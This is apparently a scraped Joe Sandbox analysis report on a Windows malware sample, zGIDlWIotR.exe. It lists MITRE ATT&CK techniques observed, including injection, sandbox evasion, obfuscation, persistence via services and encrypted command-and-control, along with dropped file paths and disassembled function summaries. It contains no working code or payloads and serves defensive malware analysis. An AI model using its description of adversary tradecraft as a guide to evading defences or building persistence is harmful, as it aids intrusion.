Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zGIDlWIotR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\helrrxxyrxmppnn\oym5yamsp1r

C:\helrrxxyrxmppnn\aoxsaykytfn.exe

C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe

C:\helrrxxyrxmppnn\lxugwbfrq.exe

C:\helrrxxyrxmppnn\oym5yamsp1r

C:\helrrxxyrxmppnn\zqzgdqiac

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

Windows Analysis Report
zGIDlWIotR.exe

Function 00381380 Relevance: 258.6, APIs: 143, Strings: 3, Instructions: 3150
libraryloadersleepCOMMON

Function 00387210 Relevance: 63.2, APIs: 13, Strings: 22, Instructions: 1960
libraryloaderthreadCOMMON

Function 003852E0 Relevance: 30.4, APIs: 15, Strings: 2, Instructions: 631
fileCOMMON

Function 0038D840 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 214
filesleepCOMMON

Function 00391CA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
memoryCOMMON

Function 003836C9 Relevance: 39.6, APIs: 26, Instructions: 623
sleepfilelibraryCOMMON

Function 00394560 Relevance: 12.2, APIs: 8, Instructions: 225
fileCOMMON

Function 0038A9D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 169
fileCOMMON

Function 00386260 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
processCOMMON

Function 0039D76C Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Function 0039DF62 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10
COMMON

Function 0039DC8D Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Function 003BC120 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Function 0039FE05 Relevance: 1.5, APIs: 1, Instructions: 3
COMMONLIBRARYCODE

Function 003883D6 Relevance: 1.5, APIs: 1, Instructions: 243
COMMON

Function 003992C0 Relevance: 23.4, APIs: 12, Strings: 1, Instructions: 635
networkCOMMON

Function 003923B0 Relevance: 16.9, APIs: 11, Instructions: 431
librarymemoryloaderCOMMON

Function 003906A0 Relevance: 12.2, APIs: 8, Instructions: 194
serviceCOMMON

Function 0039B350 Relevance: 10.6, APIs: 7, Instructions: 102
serviceCOMMON

Function 0039A078 Relevance: 9.1, APIs: 6, Instructions: 91
processCOMMON

Function 003BE3DC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
COMMONLIBRARYCODE

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre